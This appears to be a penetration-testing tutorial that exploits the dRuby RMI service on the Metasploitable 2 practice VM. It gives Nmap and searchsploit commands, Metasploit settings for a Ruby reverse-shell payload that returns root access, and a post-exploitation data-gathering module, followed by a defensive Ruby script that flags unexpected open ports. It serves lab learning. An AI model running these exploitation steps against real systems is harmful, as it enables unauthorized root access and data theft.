In this tutorial we will be hacking dRuby using a remote code execution vulnerability in the dRuby RMI server that is running on Metasploitable 2. dRuby is a distributed object system for Ruby and is written in Ruby. dRuby uses its own protocol and binds itself to a URI such as druby://example.com on port 8787. By default port 8787 is not scanned by Nmap since it is not included in the list of 1,000 common ports that are scanned by default when no additional port options are specified. Open port 8787 on Metasploitable 2 would remain unnoticed unless we were using the -p- flag to scan all 65535 ports or a port range which includes port 8787. This example shows us how important it is to always run a full port scan on a target when performing network enumeration. We could easily be missing important information which can be used to compromise the target.
Hacking dRuby RMI Server 1.8 with Metasploit
We will begin the dRuby hacking tutorial by scanning port 8787 with Nmap, after which we will be performing a vulnerability assessment. Then we will be hacking the dRuby RMI server using Metasploit by exploiting the vulnerabilities we found. We will conclude this tutorial with a Metasploit post exploitation module to gather information from the compromised system and a review of the lessons learned.
Nmap scan on port 8787
Let's run the following command on the console to perform an Nmap service scan on Metasploitable on port 8787:
nmap -sV [IP] -p8787
As we already expected, port 8787 is open and Ruby DRb RMI server version 1.8 is running on the target host. Let's see what vulnerabilities are available for this version of distributed Ruby (dRuby) using searchsploit.
Searchsploit dRuby exploits
Let's try to search the searchsploit database using an exact match search with the -e flag:
searchsploit -e Ruby DRb RMI
The exact match query doesn't return any results. This means that we have to use a more general search term. We could remove RMI from the search term and, if that doesn't return any results either, we can simply search for Ruby exploits and go through the results one by one. Personally I would suggest using this approach, where we go from specific search terms to general search terms, when a general search term returns too many results. For example the search term WordPress returns hundreds of results and 'WordPress 3' only 9.
When we search searchsploit for Ruby exploits using the following command we are presented with fewer than 30 results:
When we go through the list of exploits we can see 2 exploits for Distributed Ruby which are worth examining further. Let's narrow the results by searching for 'Distributed Ruby':
Remember to put the -e flag in our command to only show results which are an exact match for this search term. Let's check out the Distributed Ruby Send instance_eval/syscall Code Execution exploit. When we use the following command we get some additional information about the exploit and the path to the exploit is copied to the clipboard:
searchsploit -p 17058
Next we can check the file contents using the following command:
Metasploit: hacking dRuby RMI server 1.8
We can see that we are dealing with a Metasploit exploit here. Let's fire up Metasploit and search for the exploit there. Run the following command to start the msfconsole:
Since we know the name of the exploit we can search only the name field using the following command:
search title:Distributed Ruby Send instance_eval/syscall Code Execution
And then select the exploit using the use command:
Let's first set a Ruby reverse shell payload for this exploit using the following command:
set payload cmd/unix/reverse_ruby
Use the options command to show the available options for this exploit:
Next we need to set the LHOST for the payload:
set LHOST [IP attack box]
And we set the URI using the following command (the expected format is mentioned in the description):
set URI druby://[Target IP]:8787
The listening port can be left as is. All that remains now is running the exploit using the exploit command and, if everything is done correctly, a reverse shell with root privileges is returned to the attack box:
Post exploitation info gathering
Let's go one step further and have a look at one of the post exploitation/information gathering modules available for Linux, the enum_system module. We can select this module by backgrounding command shell session 1 using CTRL + Z. It will then ask us to background the current session; confirm with 'y'.
Next select the enum_system module using the following command:
Type the info command to see what exactly this module does:
The description tells us that the module gathers system information such as installed packages, installed services, mount information, the user list, user bash history and cron jobs.
To run this post gather module we need to point the module to the active session using the following command:
set session 1
Now type run to execute the module:
We can see that all information is downloaded to our attack box and saved at the following location:
To examine the files you can simply cd to that location and cat the contents of the text files to the console.
In this exploitation tutorial we have learned a few important things about penetration testing. Let's review the lessons learned in this hacking tutorial.
Scan all ports
The first thing we have learned is that we need to scan all available ports on a target host when performing a penetration test. When we run the default Nmap port scans only the top 1000 ports are scanned. In this tutorial we have compromised a host using a service running on a port which was not in Nmap's default port list.
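The same lesson applies on the defending side: a full-range scan of your own hosts is only useful if someone compares the result with what is supposed to be listening. The Ruby block below is an added example, not part of the tutorial, that parses Nmap grepable (-oG) output and reports open ports missing from an approved baseline, so a service like DRb on 8787 stands out instead of hiding in the noise. The sample scan output is constructed for the example (the version strings imitate what Nmap prints for Metasploitable 2 but are not copied from a real scan), and `parse_gnmap` and `unexpected_open_ports` are my own names.

```ruby
# Added example: find open ports that are not on an approved baseline,
# using Nmap's grepable (-oG) output as input.

# Constructed sample of a full-range (-p-) service scan in -oG format.
# Each port entry has the form port/state/protocol/owner/service/rpc/version/.
SAMPLE_GNMAP = <<~GNMAP
  # Nmap scan initiated as: nmap -sV -p- -oG scan.gnmap 192.168.1.10
  Host: 192.168.1.10 ()\tStatus: Up
  Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, 80/open/tcp//http//Apache httpd 2.2.8/, 8787/open/tcp//drb//Ruby DRb RMI (Ruby 1.8)/\tIgnored State: closed (65532)
GNMAP

OpenPort = Struct.new(:host, :port, :proto, :service, :version)

# Returns one OpenPort per open port found in the grepable output.
# Lines without a "Ports:" field (status lines, comments) are skipped.
def parse_gnmap(text)
  text.each_line.flat_map do |line|
    next [] unless line.start_with?('Host:') && line.include?('Ports:')

    host = line[/\AHost:\s+(\S+)/, 1]
    ports_field = line[/Ports:\s+(.*?)(?:\t|$)/, 1]

    ports_field.split(',').map(&:strip).filter_map do |entry|
      # Limit the split to 7 fields so a version string containing '/'
      # stays intact; the trailing '/' of the entry is then trimmed.
      port, state, proto, _owner, service, _rpc, version = entry.split('/', 7)
      next unless state == 'open'

      OpenPort.new(host, Integer(port), proto, service, version.to_s.chomp('/'))
    end
  end
end

# Open ports whose port number is not in the approved baseline.
def unexpected_open_ports(text, baseline)
  parse_gnmap(text).reject { |p| baseline.include?(p.port) }
end

if __FILE__ == $PROGRAM_NAME
  unexpected_open_ports(SAMPLE_GNMAP, [22, 80]).each do |p|
    puts "#{p.host}: #{p.port}/#{p.proto} #{p.service} (#{p.version}) is not on the baseline"
  end
end
```

Run it against a real `nmap -sV -p- -oG scan.gnmap <host>` file by replacing the constructed sample; the baseline is the set of ports an asset is documented to serve, and anything the function returns is either undocumented or unwanted.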
Search exploits in an effective and efficient way
We've also learned how to use searchsploit effectively when too many results are returned, or none at all. A good approach when a general search term returns too many results is to go from very specific to more general search terms. Very specific could be the service name together with the version number, and a more general search term could be only the service name. In this tutorial the search term 'Ruby DRb RMI' didn't return any results but 'Distributed Ruby' got us the results we were looking for.
Post exploitation and information gathering
Last but not least we have seen a glimpse of one of Metasploit's post gather modules: enum_system. After hacking dRuby we can download some important information from the compromised host to our attack box using the enum_system module, such as log files, setuid/setgid files and services. Post exploitation and information gathering is an important part of every penetration test. In this case we got root access to the host with the first reverse shell. More often an unprivileged shell is returned and post exploitation techniques have to be used for privilege escalation. In tutorials to follow we will be going into more detail on post exploitation and privilege escalation.